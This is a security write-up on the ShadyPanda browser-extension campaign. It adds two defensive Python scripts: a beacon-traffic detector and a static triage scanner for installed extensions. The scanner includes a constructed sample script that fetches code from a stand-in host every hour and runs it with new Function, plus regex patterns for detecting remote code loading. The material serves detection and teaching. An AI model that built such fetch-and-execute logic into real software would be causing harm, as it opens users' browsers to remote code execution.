
Sleeper Apps Awakened
A deceptive operation known as ShadyPanda quietly operated for years, distributing seemingly harmless browser extensions through both the Chrome Web Store and the Microsoft Edge Add-ons store. Some of these extensions even achieved ‘Featured’ and ‘Verified’ status, accumulating millions of downloads and positive reviews. The group behind ShadyPanda diligently maintained them, shipping updates as new browser versions were released and bugs were reported.
This extensive groundwork, however, was a prelude to malicious activation. A recent update turned these trusted extensions into potent malware. Once updated, the extensions began extensive surveillance, “checking api.extensionplay[.]com for new instructions every hour, downloading arbitrary JavaScript, and executing it with full browser API access. It can also inject malicious content into any website, including HTTPS connections.” This let the attackers monitor browsing activity in real time or collect logs for later upload.
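The hourly check-in quoted above is the kind of behaviour a network defender can spot without knowing anything about the extension itself: a host contacted at a near-constant interval from a workstation stands out from ordinary browsing. The following is an added example written for this write-up, not code from ShadyPanda or any vendor. It groups requests from constructed proxy log lines by client and destination, measures the regularity of the gaps between requests, and additionally matches the one indicator the write-up publishes (api.extensionplay[.]com, used here undefanged so it matches real log data). The log format, the one-hour cadence in the sample and the jitter threshold are assumptions made for the example.

```python
"""Flag hosts that a client contacts at a suspiciously regular cadence, the
way a command-and-control beacon does.  Added example for this write-up,
not ShadyPanda code; the proxy log lines below are constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: "<ISO-8601 UTC timestamp> <client-ip> <host> <path>".
# The one-hour cadence to api.extensionplay.com mirrors the interval quoted
# in the write-up; the other lines are ordinary browsing noise.
SAMPLE_LOG = """\
2024-05-01T08:00:02Z 10.0.0.5 api.extensionplay.com /v1/instructions
2024-05-01T08:14:11Z 10.0.0.5 example.org /news
2024-05-01T09:00:05Z 10.0.0.5 api.extensionplay.com /v1/instructions
2024-05-01T09:31:40Z 10.0.0.5 example.org /news/story-1
2024-05-01T10:00:01Z 10.0.0.5 api.extensionplay.com /v1/instructions
2024-05-01T10:45:22Z 10.0.0.5 cdn.example.net /lib.js
2024-05-01T11:00:04Z 10.0.0.5 api.extensionplay.com /v1/instructions
2024-05-01T12:00:03Z 10.0.0.5 api.extensionplay.com /v1/instructions
2024-05-01T12:10:00Z 10.0.0.5 example.org /about
"""

# Indicator taken from the write-up (printed there defanged as api.extensionplay[.]com).
KNOWN_C2_HOSTS = {"api.extensionplay.com"}


def parse_log(text):
    """Group request timestamps by (client, host)."""
    hits = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, client, host, _path = line.split(maxsplit=3)
        hits[(client, host)].append(datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ"))
    return hits


def beacon_score(timestamps, min_hits=4):
    """Return (mean gap in seconds, jitter ratio) for a series of timestamps,
    or None when there are too few requests to judge regularity."""
    if len(timestamps) < min_hits:
        return None
    ordered = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
    avg = mean(gaps)
    if avg <= 0:
        return None
    return avg, pstdev(gaps) / avg


def find_beacons(text, max_jitter=0.05, min_hits=4):
    """Return the (client, host) pairs that look like beacons, with reasons."""
    findings = []
    for (client, host), stamps in parse_log(text).items():
        score = beacon_score(stamps, min_hits)
        reasons = []
        if score is not None:
            avg, jitter = score
            if jitter <= max_jitter:
                reasons.append(f"regular cadence ~{avg / 60:.0f} min (jitter {jitter:.2%})")
        if host in KNOWN_C2_HOSTS:
            reasons.append("host matches a published ShadyPanda indicator")
        if reasons:
            findings.append({"client": client, "host": host,
                             "hits": len(stamps), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['client']} -> {f['host']} ({f['hits']} hits): " + "; ".join(f["reasons"]))
```

On the constructed sample only the api.extensionplay.com series is reported: five requests roughly 3600 seconds apart with well under one percent jitter, plus the indicator match. The cadence check matters more than the indicator list, since the write-up describes the instructions endpoint as something the attackers control and could move; tune `max_jitter` and `min_hits` to the noise level of the logs being examined.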
The malware also incorporated a clever evasion technique: if a user opened the browser’s developer tools, the extensions reverted to their benign behaviour, avoiding detection. Chrome’s update review process quickly flagged the malicious activity and the extensions were removed from the Chrome Web Store, but some systems had already been infected. The extensions remained available in the Edge Add-ons store until recently.
Users who have noticed the sudden disappearance of a previously installed browser extension should consider performing a thorough scan of their system.
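Because the malicious extensions behaved benignly whenever developer tools were open, inspecting them at runtime could be misleading; the files the browser unpacks into the profile directory are not affected by that trick. The following is an added example for this write-up, not ShadyPanda code or a vendor scanner: a static triage script that walks the default Chrome and Edge extension folders, reads each manifest, and flags the combination the write-up describes, namely access to every site together with scripts that pull code or instructions from a remote URL and execute them. The profile paths are the standard layouts for the "Default" profile, the permission and pattern lists are the author's assumptions, and the sample manifest and script are constructed.

```python
"""Static triage of browser extensions installed on disk.  Added example for
this write-up, not ShadyPanda code or a vendor tool.  Profile paths are the
default Chrome/Edge layouts (assumption: the "Default" profile); the sample
manifest and script at the bottom are constructed."""
import json
import os
import re
from pathlib import Path

HOME = Path.home()
LOCALAPPDATA = Path(os.environ.get("LOCALAPPDATA", ""))
PROFILE_ROOTS = [
    HOME / ".config/google-chrome/Default/Extensions",
    HOME / ".config/microsoft-edge/Default/Extensions",
    HOME / "Library/Application Support/Google/Chrome/Default/Extensions",
    HOME / "Library/Application Support/Microsoft Edge/Default/Extensions",
    LOCALAPPDATA / "Google/Chrome/User Data/Default/Extensions",
    LOCALAPPDATA / "Microsoft/Edge/User Data/Default/Extensions",
]

# Match patterns that grant access to every site, and APIs that let an
# extension read or rewrite page content and traffic (assumed risk list).
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
POWERFUL_APIS = {"scripting", "tabs", "webRequest", "webRequestBlocking",
                 "declarativeNetRequest", "cookies", "webNavigation", "debugger"}
REMOTE_LOAD = re.compile(r"""\b(?:fetch|importScripts)\s*\(\s*['"]https?://[^'"]+['"]""")
DYNAMIC_EVAL = re.compile(r"""\b(?:eval|new\s+Function)\s*\(""")


def audit_manifest(manifest):
    """Return human-readable findings for one parsed manifest.json."""
    findings = []
    declared = set(manifest.get("permissions", []))
    # MV2 lists host patterns under "permissions"; MV3 under "host_permissions".
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in declared if "://" in p or p == "<all_urls>"}
    for cs in manifest.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))
    if hosts & BROAD_HOSTS:
        findings.append("can read and modify every site (broad host match)")
    apis = declared & POWERFUL_APIS
    if apis:
        findings.append("powerful browser APIs: " + ", ".join(sorted(apis)))
    return findings


def audit_script_source(name, src):
    """Return findings for one JavaScript source text."""
    findings = []
    if REMOTE_LOAD.search(src):
        findings.append(f"{name}: loads code or instructions from a remote URL")
    if DYNAMIC_EVAL.search(src):
        findings.append(f"{name}: executes dynamically built code")
    return findings


def audit_extension(ext_dir):
    """Audit one unpacked extension directory; returns (name, findings)."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8-sig"))
    findings = audit_manifest(manifest)
    for js in ext_dir.rglob("*.js"):
        rel = js.relative_to(ext_dir).as_posix()
        findings += audit_script_source(rel, js.read_text(errors="ignore"))
    return manifest.get("name", "?"), findings


def audit_profiles(roots=PROFILE_ROOTS):
    """Scan every known profile root; returns {extension dir: (name, findings)}."""
    report = {}
    for root in roots:
        if not root.is_dir():
            continue
        for manifest in root.rglob("manifest.json"):
            name, findings = audit_extension(manifest.parent)
            if findings:
                report[str(manifest.parent)] = (name, findings)
    return report


# Constructed sample resembling the behaviour described in the write-up.
SAMPLE_MANIFEST = {"manifest_version": 3, "name": "Constructed Sample", "version": "1.0",
                   "permissions": ["scripting", "storage"], "host_permissions": ["<all_urls>"],
                   "background": {"service_worker": "bg.js"}}
SAMPLE_BG_JS = ('setInterval(async () => { const r = await fetch("https://example.invalid/instructions");'
                ' new Function(await r.text())(); }, 3600000);')

if __name__ == "__main__":
    for line in audit_manifest(SAMPLE_MANIFEST) + audit_script_source("bg.js", SAMPLE_BG_JS):
        print("sample:", line)
    for path, (name, findings) in audit_profiles().items():
        print(f"{name} ({path})")
        for line in findings:
            print("  -", line)
```

This is a triage aid, not a verdict: many legitimate extensions legitimately request broad host access or fetch data from their own servers, so the output is a shortlist of extensions worth reviewing by hand, with the extension ID in the path available for a store lookup. An extension that has been pulled from the store can no longer be looked up there, which is exactly the situation the paragraph above describes.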
